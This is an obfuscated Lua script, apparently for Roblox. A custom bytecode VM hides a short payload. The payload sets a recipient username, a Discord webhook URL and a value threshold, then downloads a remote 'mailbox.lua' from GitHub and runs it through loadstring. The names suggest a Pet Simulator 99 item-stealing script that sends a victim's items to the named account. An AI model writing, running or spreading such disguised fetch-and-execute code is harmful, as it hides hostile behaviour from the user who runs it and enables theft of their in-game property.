--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0 + 0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-(2 -1))))%(((880 -(282 + 595)) -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;end end else local v86=(570 -((2004 -(1523 + 114)) + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v86 + v86))>=v86) and 1) or (0 + 0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(1066 -(68 + 997))) then return (v37 * (1526 -(226 + 232 + 812))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -((989 -(892 + 65)) + 85)) ;v35=1 + 0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + ((261 + 93) -(87 + 263)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (628 -372)) + v38 ;end local function v24()local v42=(1080 -(1020 + 60)) -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(955 -(802 + 150))) then if (v47==(0 -0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1;v45=0;end elseif (v47==(3044 -(915 + 82))) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(1423 -(630 + 793))))) or (v48 * NaN) ;end return v8(v48,v47-((4923 -3470) -(44 + 386)) ) * (v45 + (v46/(((9 -7) -0)^(1239 -(1069 + 118))))) ;end if (v42==(2 + 0)) then v47=v20(v44,(313 + 480) -(201 + 571) ,70 -39 );v48=((v20(v44,69 -37 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;v42=10 -7 ;end if (v42==((2726 -1934) -(368 + 423))) then v45=3 -(1749 -(760 + 987)) ;v46=(v20(v44,(1932 -(1789 + 124)) -(10 + 8) ,76 -56 ) * ((1 + 1)^(474 -(416 + 26)))) + v43 ;v42=6 -4 ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1 -0 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(766 -(745 + 21))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v67=2 -1 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==4) then while true do if ((1004 -(923 + 79))~=v53) then else local v96=1636 -(1373 + 263) ;while true do if ((1001 -(451 + 549))~=v96) then else v53=3;break;end if (v96==0) then v58=nil;v59=nil;v96=1 + 0 ;end end end if (v53==1) then v56=nil;v57=nil;v53=2 -0 ;end if (v53==0) then local v97=0;while true do if ((1 -0)==v97) then v53=1;break;end if (v97==0) then v54=1384 -(746 + 638) ;v55=nil;v97=1 + 0 ;end end end if (3==v53) then v60=nil;while true do local v98=0;while true do if (v98==1) then if (v54~=(0 -0)) then else local v128=0;while true do if (v128~=(342 -(218 + 123))) then else v57={};v58={v55,v56,nil,v57};v128=2;end if (v128==0) then v55={};v56={};v128=1;end if (v128==2) then v54=561 -(306 + 254) ;break;end end end break;end if (v98==0) then if (v54==2) then for v140=1 + 0 ,v23() do local v141=0;local v142;local v143;local v144;while true do if ((1 -0)==v141) then v144=nil;while true do if (v142==1) then while true do if (v143==(1467 -(899 + 568))) then v144=v21();if (v20(v144,1 + 0 ,2 -1 )==0) then local v169=603 -(268 + 335) ;local v170;local v171;local v172;local v173;while true do if ((290 -(60 + 230))==v169) then v170=572 -(426 + 146) ;v171=nil;v169=1 + 0 ;end if (v169==2) then while true do if (v170~=2) then else local v178=0;local v179;local v180;while true do if (v178~=(1456 -(282 + 1174))) then else v179=811 -(569 + 242) ;v180=nil;v178=2 -1 ;end if (v178~=1) then else while true do if ((0 + 0)==v179) then v180=1024 -(706 + 318) ;while true do if (v180==(1252 -(721 + 530))) then v170=3;break;end if (v180==0) then local v193=1271 -(945 + 326) ;while true do if (v193~=1) then else v180=1;break;end if (v193==(0 -0)) then if (v20(v172,1,1 + 0 )==1) then v173[2]=v60[v173[2]];end if (v20(v172,2,2)==(701 -(271 + 429))) then v173[3]=v60[v173[3]];end v193=1 + 0 ;end end end end break;end end break;end end end if ((1501 -(1408 + 92))==v170) then local v181=0;local v182;while true do if (v181~=0) then else v182=0;while true do if (v182==(1086 -(461 + 625))) then v173={v22(),v22(),nil,nil};if (v171==0) then local v190=0;local v191;local v192;while true do if (v190~=(1288 -(993 + 295))) then else v191=0;v192=nil;v190=1;end if (v190==(1 + 0)) then while true do if (v191==(1171 -(418 + 753))) then v192=0;while true do if (v192~=(0 + 0)) then else v173[1 + 2 ]=v22();v173[2 + 2 ]=v22();break;end end break;end end break;end end elseif (v171==(1 + 0)) then v173[3]=v23();elseif (v171==2) then v173[3]=v23() -((531 -(406 + 123))^16) ;elseif (v171==(1772 -(1749 + 20))) then local v201=0;local v202;while true do if (v201==(0 + 0)) then v202=1322 -(1249 + 73) ;while true do if (v202~=(0 + 0)) then else v173[1148 -(466 + 679) ]=v23() -((4 -2)^16) ;v173[11 -7 ]=v22();break;end end break;end end end v182=1;end if (v182==1) then v170=1902 -(106 + 1794) ;break;end end break;end end end if ((0 + 0)==v170) then local v183=0;local v184;local v185;while true do if (v183==(0 + 0)) then v184=0 -0 ;v185=nil;v183=2 -1 ;end if (v183==1) then while true do if (0~=v184) then else v185=114 -(4 + 110) ;while true do if (0==v185) then local v194=584 -(57 + 527) ;while true do if (v194==(1428 -(41 + 1386))) then v185=1;break;end if (v194==0) then v171=v20(v144,2,3);v172=v20(v144,4,109 -(17 + 86) );v194=1 + 0 ;end end end if (v185~=(1 -0)) then else v170=1;break;end end break;end end break;end end end if (v170==(8 -5)) then if (v20(v172,169 -(122 + 44) ,3)==1) then v173[6 -2 ]=v60[v173[12 -8 ]];end v55[v140]=v173;break;end end break;end if (v169==1) then v172=nil;v173=nil;v169=2;end end end break;end end break;end if ((0 + 0)==v142) then local v162=0 + 0 ;while true do if (v162==1) then v142=1 -0 ;break;end if (v162~=0) then else v143=65 -(30 + 35) ;v144=nil;v162=1 + 0 ;end end end end break;end if (v141==0) then local v160=1257 -(1043 + 214) ;while true do if (v160~=1) then else v141=1;break;end if (v160==(0 -0)) then v142=0;v143=nil;v160=1213 -(323 + 889) ;end end end end end for v145=2 -1 ,v23() do v56[v145-(581 -(361 + 219)) ]=v28();end return v58;end if (v54==(321 -(53 + 267))) then local v129=0 + 0 ;local v130;while true do if ((413 -(15 + 398))~=v129) then else v130=982 -(18 + 964) ;while true do if (0~=v130) then else v59=v23();v60={};v130=1;end if (v130==(7 -5)) then v54=2 + 0 ;break;end if (v130==(1 + 0)) then for v163=851 -(20 + 830) ,v59 do local v164=0 + 0 ;local v165;local v166;local v167;while true do if (v164~=(127 -(116 + 10))) then else v167=nil;while true do if (v165~=0) then else local v174=0;local v175;local v176;while true do if ((0 + 0)~=v174) then else v175=738 -(542 + 196) ;v176=nil;v174=1 -0 ;end if (v174~=(1 + 0)) then else while true do if (v175==(0 + 0)) then v176=0 + 0 ;while true do if (v176~=0) then else local v189=0 -0 ;while true do if (v189~=0) then else v166=v21();v167=nil;v189=1;end if (v189==(2 -1)) then v176=1552 -(1126 + 425) ;break;end end end if (v176~=1) then else v165=1;break;end end break;end end break;end end end if (1~=v165) then else if (v166==1) then v167=v21()~=0 ;elseif (v166==2) then v167=v24();elseif (v166==(408 -(118 + 287))) then v167=v25();end v60[v163]=v167;break;end end break;end if (0~=v164) then else local v168=0;while true do if (v168~=1) then else v164=3 -2 ;break;end if (v168==(1121 -(118 + 1003))) then v165=0 -0 ;v166=nil;v168=1;end end end end end v58[3]=v21();v130=379 -(142 + 235) ;end end break;end end end v98=1;end end end break;end end break;end if (v52~=3) then else v59=nil;v60=nil;v52=18 -14 ;end if (v52==2) then v57=nil;v58=nil;v52=1 + 2 ;end if (v52==(978 -(553 + 424))) then v55=nil;v56=nil;v52=3 -1 ;end if (v52~=(0 + 0)) then else v53=0;v54=nil;v52=1;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=9) then if (v82<=4) then if (v82<=1) then if (v82>0) then local v99=v81[2];local v100,v101=v72(v79[v99](v13(v79,v99 + 1 ,v81[3])));v74=(v101 + v99) -1 ;local v102=0;for v125=v99,v74 do v102=v102 + 1 ;v79[v125]=v100[v102];end else v79[v81[2]]=v81[3];end elseif (v82<=2) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>3) then local v132=v81[2];v79[v132]=v79[v132](v13(v79,v132 + 1 ,v74));elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82<=6) then if (v82==5) then v73=v81[3];else local v106=v81[2];v79[v106]=v79[v106](v13(v79,v106 + 1 ,v74));end elseif (v82<=7) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82==8) then v79[v81[2]]();else v73=v81[3];end elseif (v82<=14) then if (v82<=11) then if (v82==10) then v63[v81[3]]=v79[v81[2]];else do return;end end elseif (v82<=12) then local v110=0;local v111;local v112;while true do if (v110==0) then v111=v81[2];v112=v79[v81[3]];v110=1;end if (v110==1) then v79[v111 + 1 ]=v112;v79[v111]=v112[v81[4]];break;end end elseif (v82>13) then v79[v81[2]]=v81[3];else do return;end end elseif (v82<=16) then if (v82==15) then local v113=0;local v114;local v115;local v116;local v117;while true do if (v113==1) then v74=(v116 + v114) -1 ;v117=0;v113=2;end if (v113==2) then for v156=v114,v74 do v117=v117 + 1 ;v79[v156]=v115[v117];end break;end if (v113==0) then v114=v81[2];v115,v116=v72(v79[v114](v13(v79,v114 + 1 ,v81[3])));v113=1;end end else v63[v81[3]]=v79[v81[2]];end elseif (v82<=17) then local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];elseif (v82>18) then v79[v81[2]]();elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03063O004D696E524150025O0088C340030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F50532O392F6D61696E2F6D61696C626F782E6C756103083O00557365724E616D65030C3O007761636B79786D617374657203073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323038373235393034322O373234313835382F6D50484B634C7558346752346A6F634B4448543639692O6A6E3363776A41746548536C7476794E745A6C6647747338342O636B7A3739644367534366344E42334431386B00163O00120E3O00013O0026023O000D000100020004053O000D000100120E000100043O001210000100033O001207000100053O001207000200063O00201100020002000700120E000400084O000F000200044O000400013O00022O00130001000100010004053O001500010026023O0001000100010004053O0001000100120E0001000A3O001210000100093O00120E0001000C3O0012100001000B3O00120E3O00023O0004053O000100012O000D3O00017O00",v9(),...);
